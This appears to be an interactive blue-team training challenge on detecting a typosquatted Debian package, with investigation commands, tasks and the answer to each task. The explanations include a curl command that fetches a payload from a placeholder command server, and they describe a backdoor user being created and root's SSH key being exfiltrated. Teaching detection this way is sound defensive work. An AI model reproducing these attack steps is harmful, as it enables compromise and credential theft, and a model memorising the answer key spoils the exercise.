Challenge 09 • Supply Chain Attack Detection

Understanding Supply Chain Attacks

Supply chain attacks target the software distribution process, compromising packages before they reach end users. These attacks are particularly dangerous because users trust package repositories and install software without suspicion.

⚠️ Why Supply Chain Attacks are Critical

Wide Impact: One compromised package can infect thousands of systems

Trust Exploitation: Users trust official-looking packages and repositories

Stealth: Malicious code hidden in legitimate-looking updates

Persistence: Infected packages remain until manually removed

Credential Theft: Can steal secrets, API keys, and sensitive data

📦 Package Manager Security

APT (Debian/Ubuntu): Uses dpkg for package management, GPG for signature verification

Repository Trust: Packages signed with GPG keys, repositories defined in /etc/apt/sources.list

Post-install Scripts: .postinst scripts run as root after package installation

Logs: /var/log/dpkg.log and /var/log/apt/ track all package operations

🎯 Common Attack Vectors

Typosquatting: Packages with names similar to popular ones (requets vs requests)

Dependency Confusion: Uploading malicious package with same name as internal dependency

Compromised Maintainer: Attacker gains access to legitimate package maintainer account

Malicious Repository: Adding untrusted third-party repositories

Supply Chain Attack Techniques

🚨 Typosquatting

Similar names: python3-requets (vs requests)
Character substitution: 0 for O, 1 for l
Added/removed characters
Users install by mistake
Malicious code in postinst scripts

🔓 Unsigned Packages

Missing GPG signature verification
Self-signed or unknown keys
Repository without Release.gpg
Bypassing signature checks
Warning: "package cannot be authenticated"

📜 Malicious Post-Install Scripts

Download additional payloads
Create backdoor users
Exfiltrate sensitive data
Install cryptominers
Modify system configurations

🌐 Untrusted Repositories

Third-party PPAs with no verification
HTTP instead of HTTPS sources
Unknown repository domains
Recently created repositories
Lack of community review

Investigation Commands

# Check installed packages
dpkg -l | grep -v "^ii"

# View package install history
cat /var/log/dpkg.log | grep " install "

# Check package signatures
apt-key list

# View custom repositories
ls -la /etc/apt/sources.list.d/

# Examine postinst script
cat /var/lib/dpkg/info/package.postinst

🚨 Critical Defense: Only install packages from trusted repositories, verify GPG signatures, review postinst scripts before installation, use tools like apt-listchanges, and implement Software Bill of Materials (SBOM) tracking.

Evidence Review

📦 /var/log/dpkg.log Click lines to tag as evidence

📋 /var/log/apt/history.log

📜 Post-Install Script (python3-requets.postinst)

🌐 /etc/apt/sources.list.d/suspicious-repo.list

📄 /var/log/syslog (during installation)

📌 Evidence Locker

No evidence tagged yet. Click log lines to add them.

Interactive Terminal

Run commands to analyze package security. Available: dpkg, apt, cat, grep, ls, clear, help

analyst@blueteam:~$ Terminal ready. Type 'help' for available commands.

analyst@blueteam:~$

Investigation Tasks

Tasks Completed: 0 / 11

Task 1 — Malicious Package Name

✓ Correct Answer:

python3-requets

dpkg.log shows installation of "python3-requets" - Note the typosquatting: "requets" instead of legitimate "requests". This is a common supply chain attack vector.

Task 2 — Legitimate Package It Imitates

✓ Correct Answer:

python3-requests

The malicious package imitates "python3-requests" (popular HTTP library). Users installing quickly might not notice the misspelling "requets" vs "requests".

Task 3 — Package Version

✓ Correct Answer:

2.28.1

dpkg.log shows version 2.28.1 was installed. Attackers often use version numbers similar to legitimate packages to appear trustworthy.

Task 4 — Untrusted Repository Domain

✓ Correct Answer:

packages-mirror.xyz

sources.list.d/suspicious-repo.list shows repository URL: packages-mirror.xyz. This is NOT an official Ubuntu/Debian repository and uses suspicious .xyz TLD.

Task 5 — Repository Protocol (http/https)

✓ Correct Answer:

http

Repository uses HTTP (not HTTPS) - insecure protocol allowing man-in-the-middle attacks. Legitimate repositories use HTTPS for secure package downloads.

Task 6 — GPG Key Verification Status

✓ Correct Answer:

unsigned

APT history shows warning: "Package cannot be authenticated". The package lacks valid GPG signature - critical security warning that should never be ignored.

Task 7 — Backdoor User Created

✓ Correct Answer:

support

Post-install script creates user "support" with useradd command. This provides persistent backdoor access. syslog confirms: "New user: support".

Task 8 — Command & Control (C2) Server IP

✓ Correct Answer:

198.51.100.42

Post-install script runs: curl 198.51.100.42/payload.sh. This downloads and executes additional malicious payload from attacker-controlled server.

Task 9 — Persistence File Location

✓ Correct Answer:

/etc/systemd/system/update-check.service

Post-install script creates systemd service at /etc/systemd/system/update-check.service. This provides persistence - malware runs automatically on system boot.

Task 10 — Exfiltrated File

✓ Correct Answer:

/root/.ssh/id_rsa

Script exfiltrates /root/.ssh/id_rsa (root's private SSH key) to C2 server. This allows attacker to SSH into system as root without password.

Task 11 — MITRE ATT&CK Technique ID

✓ Correct Answer:

T1195.002

T1195.002 = Supply Chain Compromise: Compromise Software Supply Chain. Specifically covers attacks that insert malicious code into software distribution mechanisms like package managers.

XP: 0 / 1100

Attack Analysis & Incident Summary

This section auto-fills once all tasks are completed correctly.

Supply Chain Attack Chain

Complete all tasks to reveal the supply chain attack chain.

Incident Summary

Attack type: —
Malicious package: —
Imitates: —
Package version: —
Repository domain: —
Protocol: — (insecure)
GPG verification: —
Backdoor user: —
C2 server: —
Persistence: —
Exfiltrated: —
MITRE ATT&CK: —

Recommended Remediation

Immediate: Remove python3-requets package, kill malicious processes, delete backdoor user "support", remove systemd service
Investigation: Check for other typosquatted packages, audit all third-party repositories, review recent package installations
Recovery: Rotate all SSH keys (/root/.ssh/id_rsa compromised), change all passwords, rebuild from clean state if fully compromised
Prevention: Remove untrusted repository (packages-mirror.xyz), enforce GPG verification, use apt-listchanges, implement SBOM tracking, security scan all packages

Why This Attack Succeeded

The supply chain attack succeeded because:
1. User manually added untrusted repository without verification
2. Package name typosquatting (requets vs requests) not noticed
3. GPG signature warning ignored during installation
4. Post-installation scripts not reviewed before package install
5. No package security scanning or SBOM validation
6. Repository used HTTP instead of HTTPS (insecure)

Supply Chain Security Best Practices Violated

❌ Added untrusted third-party repository
❌ Ignored GPG signature verification warnings
❌ Did not verify package authenticity
❌ Allowed HTTP repository (should be HTTPS only)
❌ No review of post-install scripts
❌ No Software Bill of Materials (SBOM) tracking
❌ No package security scanning before installation
❌ Typo in package name not caught

🛡️ Challenge 09 • Supply Chain Attack Detection

Mission Brief

Available Artifacts

Learning Objectives

Understanding Supply Chain Attacks

⚠️ Why Supply Chain Attacks are Critical

📦 Package Manager Security

🎯 Common Attack Vectors

Supply Chain Attack Techniques

🚨 Typosquatting

🔓 Unsigned Packages

📜 Malicious Post-Install Scripts

🌐 Untrusted Repositories

Investigation Commands

Evidence Review

Interactive Terminal

Investigation Tasks

Attack Analysis & Incident Summary

Supply Chain Attack Chain

Incident Summary

Recommended Remediation

Why This Attack Succeeded

Supply Chain Security Best Practices Violated